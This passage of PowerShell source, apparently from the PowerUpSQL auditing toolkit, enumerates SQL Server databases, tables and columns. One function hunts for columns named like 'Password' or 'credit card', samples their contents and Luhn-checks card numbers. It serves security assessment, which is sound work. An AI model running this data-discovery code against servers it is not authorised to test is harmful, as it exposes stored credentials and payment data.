[DatabaseId],\n            a.name as [DatabaseName],\n            SUSER_SNAME(a.owner_sid) as [DatabaseOwner],\n            IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid)) as [OwnerIsSysadmin],\n            a.is_trustworthy_on,\n        a.is_db_chaining_on,\"\n\n        # Version specific columns\n        if([int]$SQLVersionShort -ge 10)\n        {\n            $QueryVerSpec = '\n                a.is_broker_enabled,\n                a.is_encrypted,\n            a.is_read_only,'\n        }\n\n        # Query end\n        $QueryEnd = '\n            a.create_date,\n            a.recovery_model_desc,\n            b.filename as [FileName],\n            (SELECT CAST(SUM(size) * 8. / 1024 AS DECIMAL(8,2))\n            from sys.master_files where name like a.name) as [DbSizeMb],\n            HAS_DBACCESS(a.name) as [has_dbaccess]\n            FROM [sys].[databases] a\n        INNER JOIN [sys].[sysdatabases] b ON a.database_id = b.dbid WHERE 1=1'\n\n        # User defined filters\n        $Filters = \"\n            $DatabaseFilter\n            $NoDefaultsFilter\n            $HasAccessFilter\n            $SysAdminOnlyFilter\n        ORDER BY a.database_id\"\n\n        $Query = \"$QueryStart $QueryVerSpec $QueryEnd $Filters\"\n\n        # Execute Query\n        $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n        # Append results for pipeline items\n        $TblResults |\n        ForEach-Object -Process {\n            # Set version specific values\n            if([int]$SQLVersionShort -ge 10)\n            {\n                $is_broker_enabled = $_.is_broker_enabled\n                $is_encrypted = $_.is_encrypted\n                $is_read_only = $_.is_read_only\n            }\n            else\n            {\n                $is_broker_enabled = 'NA'\n                $is_encrypted = 'NA'\n                $is_read_only = 'NA'\n            }\n\n            $null = $TblDatabases.Rows.Add(\n                $_.ComputerName,\n                $_.Instance,\n                $_.DatabaseId,\n                $_.DatabaseName,\n                $_.DatabaseOwner,\n                $_.OwnerIsSysadmin,\n                $_.is_trustworthy_on,\n                $_.is_db_chaining_on,\n                $is_broker_enabled,\n                $is_encrypted,\n                $is_read_only,\n                $_.create_date,\n                $_.recovery_model_desc,\n                $_.FileName,\n                $_.DbSizeMb,\n                $_.has_dbaccess\n            )\n        }\n\n    }\n\n    End\n    {\n        # Return data\n        $TblDatabases\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLDatabaseThreaded\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLDatabaseThreaded\n{\n    <#\n            .SYNOPSIS\n            Returns database information from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER DatabaseName\n            Database name to filter for.\n            .PARAMETER NoDefaults\n            Only select non default databases.\n            .PARAMETER HasAccess\n            Only select databases the current user has access to.\n            .PARAMETER SysAdminOnly\n            Only select databases owned by a sysadmin.\n            .PARAMETER Threads\n            Number of concurrent host threads.\n            .EXAMPLE\n            PS C:\\> Get-SQLDatabaseThreaded -Instance SQLServer1\\STANDARDDEV2014 -NoDefaults -DatabaseName testdb\n\n            ComputerName        : SQLServer1\n            Instance            : SQLServer1\\STANDARDDEV2014\n            DatabaseId          : 7\n            DatabaseName        : testdb\n            DatabaseOwner       : sa\n            OwnerIsSysadmin     : 1\n            is_trustworthy_on   : True\n            is_db_chaining_on   : False\n            is_broker_enabled   : True\n            is_encrypted        : False\n            is_read_only        : False\n            create_date         : 4/13/2016 4:27:36 PM\n            recovery_model_desc : FULL\n            FileName            : C:\\Program Files\\Microsoft SQL Server\\MSSQL12.STANDARDDEV2014\\MSSQL\\DATA\\testdb.mdf\n            DbSizeMb            : 3.19\n            has_dbaccess        : 1\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLDatabaseThreaded -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Database name.')]\n        [string]$DatabaseName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Only select non default databases.')]\n        [switch]$NoDefaults,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Only select databases the current user has access to.')]\n        [switch]$HasAccess,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Only select databases owned by a sysadmin.')]\n        [switch]$SysAdminOnly,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Number of threads.')]\n        [int]$Threads = 2,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Create data tables for output\n        $TblResults = New-Object -TypeName System.Data.DataTable\n        $TblDatabases = New-Object -TypeName System.Data.DataTable\n        $null = $TblDatabases.Columns.Add('ComputerName')\n        $null = $TblDatabases.Columns.Add('Instance')\n        $null = $TblDatabases.Columns.Add('DatabaseId')\n        $null = $TblDatabases.Columns.Add('DatabaseName')\n        $null = $TblDatabases.Columns.Add('DatabaseOwner')\n        $null = $TblDatabases.Columns.Add('OwnerIsSysadmin')\n        $null = $TblDatabases.Columns.Add('is_trustworthy_on')\n        $null = $TblDatabases.Columns.Add('is_db_chaining_on')\n        $null = $TblDatabases.Columns.Add('is_broker_enabled')\n        $null = $TblDatabases.Columns.Add('is_encrypted')\n        $null = $TblDatabases.Columns.Add('is_read_only')\n        $null = $TblDatabases.Columns.Add('create_date')\n        $null = $TblDatabases.Columns.Add('recovery_model_desc')\n        $null = $TblDatabases.Columns.Add('FileName')\n        $null = $TblDatabases.Columns.Add('DbSizeMb')\n        $null = $TblDatabases.Columns.Add('has_dbaccess')\n\n        # Setup database filter\n        if($DatabaseName)\n        {\n            $DatabaseFilter = \" and a.name like '$DatabaseName'\"\n        }\n        else\n        {\n            $DatabaseFilter = ''\n        }\n\n        # Setup NoDefault filter\n        if($NoDefaults)\n        {\n            $NoDefaultsFilter = \" and a.name not in ('master','tempdb','msdb','model')\"\n        }\n        else\n        {\n            $NoDefaultsFilter = ''\n        }\n\n        # Setup HasAccess filter\n        if($HasAccess)\n        {\n            $HasAccessFilter = ' and HAS_DBACCESS(a.name)=1'\n        }\n        else\n        {\n            $HasAccessFilter = ''\n        }\n\n        # Setup owner is sysadmin filter\n        if($SysAdminOnly)\n        {\n            $SysAdminOnlyFilter = \" and IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid))=1\"\n        }\n        else\n        {\n            $SysAdminOnlyFilter = ''\n        }\n\n        # Setup data table for pipeline threading\n        $PipelineItems = New-Object -TypeName System.Data.DataTable\n\n\n        # set instance to local host by default\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Ensure provided instance is processed\n        if($Instance)\n        {\n            $ProvideInstance = New-Object -TypeName PSObject -Property @{\n                Instance = $Instance\n            }\n        }\n\n        # Add instance to instance list\n        $PipelineItems = $PipelineItems + $ProvideInstance\n    }\n\n    Process\n    {\n        # Create list of pipeline items\n        $PipelineItems = $PipelineItems + $_\n    }\n\n    End\n    {\n        # Define code to be multi-threaded\n        $MyScriptBlock = {\n            # Set instance\n            $Instance = $_.Instance\n\n            # Parse computer name from the instance\n            $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n            # Test connection to instance\n            $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n                $_.Status -eq 'Accessible'\n            }\n            if($TestConnection)\n            {\n                if( -not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : Connection Success.\"\n                }\n            }\n            else\n            {\n                if( -not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : Connection Failed.\"\n                }\n                return\n            }\n\n            # Check version\n            $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber\n            if($SQLVersionFull)\n            {\n                $SQLVersionShort = $SQLVersionFull.Split('.')[0]\n            }\n\n            # Base query\n            $QueryStart = \"  SELECT  '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                a.database_id as [DatabaseId],\n                a.name as [DatabaseName],\n                SUSER_SNAME(a.owner_sid) as [DatabaseOwner],\n                IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid)) as [OwnerIsSysadmin],\n                a.is_trustworthy_on,\n            a.is_db_chaining_on,\"\n\n            # Version specific columns\n            if([int]$SQLVersionShort -ge 10)\n            {\n                $QueryVerSpec = '\n                    a.is_broker_enabled,\n                    a.is_encrypted,\n                a.is_read_only,'\n            }\n\n            # Query end\n            $QueryEnd = '\n                a.create_date,\n                a.recovery_model_desc,\n                b.filename as [FileName],\n                (SELECT CAST(SUM(size) * 8. / 1024 AS DECIMAL(8,2))\n                from sys.master_files where name like a.name) as [DbSizeMb],\n                HAS_DBACCESS(a.name) as [has_dbaccess]\n                FROM [sys].[databases] a\n            INNER JOIN [sys].[sysdatabases] b ON a.database_id = b.dbid WHERE 1=1'\n\n            # User defined filters\n            $Filters = \"\n                $DatabaseFilter\n                $NoDefaultsFilter\n                $HasAccessFilter\n                $SysAdminOnlyFilter\n            ORDER BY a.database_id\"\n\n            $Query = \"$QueryStart $QueryVerSpec $QueryEnd $Filters\"\n\n            # Execute Query\n            $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n            # Append results for pipeline items\n            $TblResults |\n            ForEach-Object -Process {\n                # Set version specific values\n                if([int]$SQLVersionShort -ge 10)\n                {\n                    $is_broker_enabled = $_.is_broker_enabled\n                    $is_encrypted = $_.is_encrypted\n                    $is_read_only = $_.is_read_only\n                }\n                else\n                {\n                    $is_broker_enabled = 'NA'\n                    $is_encrypted = 'NA'\n                    $is_read_only = 'NA'\n                }\n\n                $null = $TblDatabases.Rows.Add(\n                    $_.ComputerName,\n                    $_.Instance,\n                    $_.DatabaseId,\n                    $_.DatabaseName,\n                    $_.DatabaseOwner,\n                    $_.OwnerIsSysadmin,\n                    $_.is_trustworthy_on,\n                    $_.is_db_chaining_on,\n                    $is_broker_enabled,\n                    $is_encrypted,\n                    $is_read_only,\n                    $_.create_date,\n                    $_.recovery_model_desc,\n                    $_.FileName,\n                    $_.DbSizeMb,\n                    $_.has_dbaccess\n                )\n            }\n        }\n\n        # Run scriptblock using multi-threading\n        $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue\n\n        return $TblDatabases\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLTable\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLTable\n{\n    <#\n            .SYNOPSIS\n            Returns table information from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DatabaseName\n            Database name to filter for.\n            .PARAMETER TableName\n            Table name to filter for.\n            .PARAMETER NoDefaults\n            Filter out results from default databases.\n            .EXAMPLE\n            PS C:\\> Get-SQLTable -Instance SQLServer1\\STANDARDDEV2014 -NoDefaults  -DatabaseName testdb\n\n            ComputerName : SQLServer1\n            Instance     : SQLServer1\\STANDARDDEV2014\n            DatabaseName : testdb\n            SchemaName   : dbo\n            TableName    : NOCList\n            TableType    : BASE TABLE\n\n            ComputerName : SQLServer1\n            Instance     : SQLServer1\\STANDARDDEV2014\n            DatabaseName : testdb\n            SchemaName   : dbo\n            TableName    : tracking\n            TableType    : BASE TABLE\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Get-SQLTable -Verbose -NoDefaults\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Database name.')]\n        [string]$DatabaseName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Table name.')]\n        [string]$TableName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't select tables from default databases.\")]\n        [switch]$NoDefaults,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        $TblTables = New-Object -TypeName System.Data.DataTable\n\n        # Setup table filter\n        if($TableName)\n        {\n            $TableFilter = \" where table_name like '%$TableName%'\"\n        }\n        else\n        {\n            $TableFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Note: Tables queried by this function typically require sysadmin or DBO privileges.\n\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n                Write-Verbose -Message \"$Instance : Grabbing tables from databases below:\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Setup NoDefault filter\n        if($NoDefaults)\n        {\n            # Get list of databases\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose\n        }\n        else\n        {\n            # Get list of databases\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose\n        }\n\n        # Get tables for each database\n        $TblDatabases |\n        ForEach-Object -Process {\n            # Get database name\n            $DbName = $_.DatabaseName\n\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : - $DbName\"\n            }\n\n            # Define Query\n            $Query = \"  USE $DbName;\n                SELECT  '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                TABLE_CATALOG AS [DatabaseName],\n                TABLE_SCHEMA AS [SchemaName],\n                TABLE_NAME as [TableName],\n                TABLE_TYPE as [TableType]\n                FROM [$DbName].[INFORMATION_SCHEMA].[TABLES]\n                $TableFilter\n            ORDER BY TABLE_CATALOG, TABLE_SCHEMA, TABLE_NAME\"\n\n            # Execute Query\n            $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n            # Append results\n            $TblTables = $TblTables + $TblResults\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblTables\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLColumn\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLColumn\n{\n    <#\n            .SYNOPSIS\n            Returns column information from target SQL Servers. Supports keyword search.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER DatabaseName\n            Database name filter.\n            .PARAMETER TableName\n            Table name filter.\n            .PARAMETER ColumnName\n            Column name filter.\n            .PARAMETER ColumnNameSearch\n            Column name filter that support wildcards.\n            .PARAMETER NoDefaults\n            Don't list anything from default databases.\n            .EXAMPLE\n            PS C:\\> Get-SQLColumn -Verbose -Instance \"SQLServer1\"\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLColumn -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Database name.')]\n        [string]$DatabaseName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Table name.')]\n        [string]$TableName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Filter by exact column name.')]\n        [string]$ColumnName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Column name using wildcards in search.  Supports comma seperated list.')]\n        [string]$ColumnNameSearch,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't select tables from default databases.\")]\n        [switch]$NoDefaults,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblColumns = New-Object -TypeName System.Data.DataTable\n\n        # Setup table filter\n        if($TableName)\n        {\n            $TableNameFilter = \" and TABLE_NAME like '%$TableName%'\"\n        }\n        else\n        {\n            $TableNameFilter = ''\n        }\n\n        # Setup column filter\n        if($ColumnName)\n        {\n            $ColumnFilter = \" and column_name like '$ColumnName'\"\n        }\n        else\n        {\n            $ColumnFilter = ''\n        }\n\n        # Setup column filter\n        if($ColumnNameSearch)\n        {\n            $ColumnSearchFilter = \" and column_name like '%$ColumnNameSearch%'\"\n        }\n        else\n        {\n            $ColumnSearchFilter = ''\n        }\n\n        # Setup column search filter\n        if($ColumnNameSearch)\n        {\n            $Keywords = $ColumnNameSearch.split(',')\n\n            [int]$i = $Keywords.Count\n            while ($i -gt 0)\n            {\n                $i = $i - 1\n                $Keyword = $Keywords[$i]\n\n                if($i -eq ($Keywords.Count -1))\n                {\n                    $ColumnSearchFilter = \"and column_name like '%$Keyword%'\"\n                }\n                else\n                {\n                    $ColumnSearchFilter = $ColumnSearchFilter + \" or column_name like '%$Keyword%'\"\n                }\n            }\n        }\n    }\n\n    Process\n    {\n        # Note: Tables queried by this function typically require sysadmin or DBO privileges.\n\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Setup NoDefault filter\n        if($NoDefaults)\n        {\n            # Get list of databases\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose\n        }\n        else\n        {\n            # Get list of databases\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose\n        }\n\n        # Get tables for each database\n        $TblDatabases |\n        ForEach-Object -Process {\n            # Get database name\n            $DbName = $_.DatabaseName\n\n            # Define Query\n            $Query = \"  USE $DbName;\n                SELECT  '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                TABLE_CATALOG AS [DatabaseName],\n                TABLE_SCHEMA AS [SchemaName],\n                TABLE_NAME as [TableName],\n                COLUMN_NAME as [ColumnName],\n                DATA_TYPE as [ColumnDataType],\n                CHARACTER_MAXIMUM_LENGTH as [ColumnMaxLength]\n                FROM\t[$DbName].[INFORMATION_SCHEMA].[COLUMNS] WHERE 1=1\n                $ColumnSearchFilter\n                $ColumnFilter\n                $TableNameFilter\n            ORDER BY TABLE_CATALOG, TABLE_SCHEMA, TABLE_NAME\"\n\n            # Execute Query\n            $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose\n\n            # Append results\n            $TblColumns = $TblColumns + $TblResults\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblColumns\n    }\n}\n\n\n# ---------------------------------------\n# Get-SQLColumnSampleData\n# ---------------------------------------\n# Author: Scott Sutherland\nFunction Get-SQLColumnSampleData\n{\n    <#\n            .SYNOPSIS\n            Returns column information from target SQL Servers. Supports search by keywords, sampling data, and validating credit card numbers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER $NoOutput\n            Don't output any sample data.\n            .PARAMETER SampleSize\n            Number of records to sample.\n            .PARAMETER Keywords\n            Number of records to sample.\n            .PARAMETER DatabaseName\n            Database to filter on.\n            .PARAMETER ValidateCC\n            Use Luhn formula to check if sample is a valid credit card.\n            Column name filter that support wildcards.\n            .PARAMETER NoDefaults\n            Don't show columns from default databases.\n            .EXAMPLE\n            PS C:\\> Get-SQLColumnSampleData -verbose -Instance SQLServer1\\STANDARDDEV2014 -Keywords \"account,credit,card\" -SampleSize 5 -ValidateCC| ft -AutoSize\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : START SEARCH DATA BY COLUMN\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : CONNECTION SUCCESS\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : - Searching for column names that match criteria...\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : - Column match: [testdb].[dbo].[tracking].[card]\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : - Selecting 5 rows of data sample from column [testdb].[dbo].[tracking].[card].\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : COMPLETED SEARCH DATA BY COLUMN\n\n            ComputerName   Instance                   Database Schema Table    Column Sample           RowCount IsCC\n            ------------   --------                   -------- ------ -----    ------ ------           -------- ----\n            SQLServer1     SQLServer1\\STANDARDDEV2014 testdb   dbo    tracking card   4111111111111111 2        True\n            SQLServer1     SQLServer1\\STANDARDDEV2014 testdb   dbo    tracking card   41111111111ASDFD 2        False\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLColumnSampleData -Keywords \"account,credit,card\" -SampleSize 5 -ValidateCC\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [switch]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Number of records to sample.')]\n        [int]$SampleSize = 1,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Comma seperated list of keywords to search for.')]\n        [string]$Keywords = 'Password',\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Database name to filter on.')]\n        [string]$DatabaseName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Use Luhn formula to check if sample is a valid credit card.')]\n        [switch]$ValidateCC,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't select tables from default databases.\")]\n        [switch]$NoDefaults,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Database')\n        $null = $TblData.Columns.Add('Schema')\n        $null = $TblData.Columns.Add('Table')\n        $null = $TblData.Columns.Add('Column')\n        $null = $TblData.Columns.Add('Sample')\n        $null = $TblData.Columns.Add('RowCount')\n\n        if($ValidateCC)\n        {\n            $null = $TblData.Columns.Add('IsCC')\n        }\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : CONNECTION FAILED\"\n            }\n            Return\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : START SEARCH DATA BY COLUMN\"\n                Write-Verbose -Message \"$Instance : - Connection Success.\"\n                Write-Verbose -Message \"$Instance : - Searching for column names that match criteria...\"\n            }\n\n            if($NoDefaults)\n            {\n                # Search for columns\n                $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -ColumnNameSearch $Keywords -NoDefaults -SuppressVerbose\n            }else\n            {\n                $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -ColumnNameSearch $Keywords -SuppressVerbose\n            }\n        }\n\n        # Check if columns were found\n        if($Columns)\n        {\n            # List columns found\n            $Columns|\n            ForEach-Object -Process {\n                $sDatabaseName = $_.DatabaseName\n                $sSchemaName = $_.SchemaName\n                $sTableName = $_.TableName\n                $sColumnName = $_.ColumnName\n                $AffectedColumn = \"[$sDatabaseName].[$sSchemaName].[$sTableName].[$sColumnName]\"\n                $AffectedTable = \"[$sDatabaseName].[$sSchemaName].[$sTableName]\"\n                $Query = \"USE $sDatabaseName; SELECT TOP $SampleSize [$sColumnName] FROM $AffectedTable WHERE [$sColumnName] is not null\"\n                $QueryRowCount = \"USE $sDatabaseName; SELECT count(CAST([$sColumnName] as VARCHAR(200))) as NumRows FROM $AffectedTable WHERE [$sColumnName] is not null\"\n\n                # Status user\n                if( -not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : - Column match: $AffectedColumn\"\n                    Write-Verbose -Message \"$Instance : - Selecting $SampleSize rows of data sample from column $AffectedColumn.\"\n                }\n\n                # Get row count for column matches\n                $RowCount = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $QueryRowCount -SuppressVerbose | Select-Object -Property NumRows -ExpandProperty NumRows\n\n                # Get sample data\n                Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $Query -SuppressVerbose |\n                Select-Object -ExpandProperty $sColumnName |\n                ForEach-Object -Process {\n                    if($ValidateCC)\n                    {\n                        # Check if value is CC\n                        $Value = 0\n                        if([uint64]::TryParse($_,[ref]$Value))\n                        {\n                            $LuhnCheck = Test-IsLuhnValid $_ -ErrorAction 